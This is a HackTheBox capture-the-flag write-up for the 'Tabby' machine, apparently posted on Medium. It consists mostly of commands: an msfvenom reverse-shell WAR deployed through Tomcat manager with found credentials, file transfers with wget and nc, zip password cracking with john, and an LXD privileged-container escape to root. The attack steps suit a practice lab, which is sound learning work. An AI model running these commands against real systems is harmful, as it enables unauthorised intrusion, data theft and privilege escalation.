HackThebox: Tabby Writeup

Reconnaissance:

Let start the recon with nmap.

# Nmap 7.91 scan initiated Sat Nov  7 20:03:51 2020 as: nmap -sC -sV -oN nmap.txt 10.10.10.194
Nmap scan report for 10.10.10.194
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
| 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 7 20:04:27 2020 -- 1 IP address (1 host up) scanned in 36.75 seconds
  • -sV: detect service version
  • Port 80: Apache
  • Port 8080: Tomcat
nano /etc/hosts
msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.4  lport=1256 -f war -o shell.war
username="tomcat" password="$3cureP4s5w0rd123!"
curl -u 'tomcat':'$3cureP4s5w0rd123!' -T shell.war 'http://10.10.10.194:8080/manager/text/deploy?path=/tabbyhack-shell'
python3 -c 'import pty; pty.spawn("/bin/sh")'
In local machine:
python -m SimpleHTTPServer 1226
In attacker machine:
wget http://your_tunnel_ip:1226/linpeas.sh
In attacker machine:
nc -w 3 10.10.14.125 4444<16162020_backup.zip
In local machine:
nc -l -p 4444 >16162020_backup.zip
sudo zip2john  16162020_backup.zip > hash
sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt

GETTING USER ACCESS:-

Then we got the password of the zip:- admin@it

cat user.txt
b6658791046xxxxxxxxxxxxx (redacted)

GETTING ROOT ACCESS:-

So here we go with our usual command i.e id

In local machine:
1.git clone https://github.com/saghul/lxd-alpine-builder.git
2.sudo ./build-alpine
Then it will make one tar.gz file and you have to transfer this file into the attacker machine.
In attacker machine:-
* wget http://10.10.10.2:1326/alpine-v3.12-x86_64-20200823_2015.tar.gz
* cp alpine-v3.12-x86_64-20200823_2015.tar.gz /home/ash
* lxc image import ./alpine-v3.12-x86_64-20200823_2015.tar.gz --alias myimage
* lxc image list
* lxc init myimage ignite -c security.privileged=true
* lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
* lxc start ignite
* lxc exec ignite /bin/sh
cd /mnt/root
cd root
cat root.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store